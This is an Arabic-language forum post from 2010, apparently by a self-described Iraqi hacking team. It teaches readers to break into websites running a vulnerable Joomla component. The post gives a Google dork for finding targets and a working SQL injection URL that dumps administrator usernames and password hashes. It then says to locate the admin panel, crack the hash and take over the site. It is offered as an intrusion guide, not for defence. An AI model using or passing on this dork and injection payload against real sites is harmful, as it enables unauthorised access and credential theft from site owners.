منتديات شلون انساك
مرحبا بك عزيزي الزائر. المرجوا منك أن تعرّف بنفسك و تدخل المنتدى معنا. إن لم يكن لديك حساب بعد, نتشرف بدعوتك لإنشائه
الادارة
علي تكنو
ali.techno.stu@gmail.com
07711007824


مجموعة ثقافية ترفيهية اجتماعية
 
الرئيسيةالرئيسية  الأعضاءالأعضاء  المجموعاتالمجموعات  التسجيلالتسجيل  دخولدخول  

اهلا وسهلا بك زائرانا الكريم في منتدياتنا يارب تقضي وقت ممتع ومفيد اخوكم علي تكنو المدير العام لمنتديات شلون انساك


شاطر | 
 

 شـرح اختراق من موقع milw0rm 2010

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
جليس القمر
عضو لامع
عضو لامع
avatar

عدد المساهمات : 447

مُساهمةموضوع: شـرح اختراق من موقع milw0rm 2010   السبت 16 يناير 2010, 7:34 am

ســـلاـــــم عليكــــمـ

احبـــ||||||||||بــــ قلبـي
شلونكمـ نشـأء الله زنيـــنـ

شرح الاختراقـــ من الموقـــعـ [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


شرح من فريق القرصنة في العـراق ... 2010

================================
اولـ شي ادخل على الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

شووووووف الصورة _____

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط][ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
والان دخلنة الي موقع الميل وروم
ندخل ع قــسم
[ web apps ]
ملاحضة شــباب
مرات ندخل للموقع نلكي ثغرات بلون غير لون الاخضر الي معروضة هيج
نلكاهة لون اصفر
يعني ثغرة جديدة

شووووف الصوـورهـ
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

راح اختـار هـاي ثغرة تاريخ قديم ..... بس مو اهواية شغالة مية مية
شووف الصورة

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
بعد فتح الثغرة شووووف شطلعلكـــ طبعـا انتـا راح دووووخ
ما تعرف وين كود البحث وين الاستغلال الاختراق وووووصول على اسم المدير رقم ...
شوووف الصورة للتوضيحـ

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

Author : v3n0m
اسم مكتشف الثغرة
Author
[+] Contact : v3n0m666[at]live[dot]com
الاميل الخاص فيه
شــباب هاي معلومات المكتشف
والثغرة في سكربت
Joomla Component
شــباب هسة الي يهمنة من هل قصة كله نبحث عن الدور والاستغلال ونطبق اول شي ندور على
dork البحث في محركات البحث العالمية
Google Dork : inurl:"com_gameserver"
دورك البحث نكتبة في محرك البحث كوكل
شوووف الصورة

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ما شاء الله ثغرة كثيرة هع هع هع
بعد ما نكتب الدور البحث في كوكل
هسة نجي ناخذ معنا الاستغلال ونجرب في موقع موقع
هذا الاستغلال
Exploit:
index.php?option=com_gameserver&view=gamepanel&id= 999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

طبعـا افتح موقع كلهـا جرب واحد واحد
الى ما يطلع عندك الخطـا
يطلع عندك
اليوزر الادارة وباس ورد الادارة اوكــي
ورهـا تروح
تفتح موووقع دور على مسـار لوحة تحكم
راح انطيك مسـار
يكوون

admin
او
administratcr

اوكـي
ورهـا تطلع لوحـة التحكمـ
بس عندك باس ورد مشفر روح على نفس الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

شوووف الصورة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
او
ا الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بعدهـا نتدخل الموقع روح العب بة بكيفكـ

تحياتي الكم احباب قلبي
فريق القرصنة في العراق
تم النقل بواسطة صديقكم ابو شاكي

_________________
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
شـرح اختراق من موقع milw0rm 2010
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات شلون انساك :: أقسام الكومبيوتر - Computer Section :: منتدى الهكر والاختراق والحماية[ Security ]-
انتقل الى: